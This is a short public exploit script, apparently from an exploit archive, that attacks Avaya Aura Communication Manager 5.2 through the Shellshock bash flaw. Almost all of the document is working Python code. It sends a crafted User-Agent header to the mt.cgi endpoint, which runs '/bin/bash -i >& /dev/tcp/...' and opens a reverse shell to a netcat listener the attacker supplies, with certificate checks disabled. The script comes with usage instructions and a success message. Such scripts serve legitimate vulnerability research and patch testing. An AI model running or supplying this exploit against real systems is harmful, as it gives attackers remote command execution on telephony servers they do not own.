# Exploit Title: Avaya Aura Communication Manager 5.2 - Remote Code Execution # Exploit Author: Sarang Tumne a.k.a SarT # Date: 2020-02-14 # Confirmed on release 5.2 # Vendor: https://www.avaya.com/en/ # Avaya's advisory: # https://downloads.avaya.com/css/P8/documents/100183151 # Exploit generates a reverse shell to a nc listener (Shellshock Exploit) ############################################### #!/usr/bin/python import sys import requests if len(sys.argv) < 4: print "\n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit" print "[*] Usage: <Victim's IP> <Attacker's IP> <Reverse Shell Port>" print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337" print "[*] Netcat Listener: nc -lvvnp <port>" print "\n" sys.exit() #Disables request warning for cert validation ignore. requests.packages.urllib3.disable_warnings() CM = sys.argv[1] url = "https://" + CM + "/mt/mt.cgi" attacker_ip = sys.argv[2] rev_port = sys.argv[3] http_headers = { "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1' } def main(): if len(sys.argv) == 4: print "[+] Success, spawning a shell on your custom port :)..." requests.get(url, headers=http_headers, verify=False, timeout=5) else: print "[-] Something went wrong, quitting..." sys.exit() if __name__ == "__main__": main()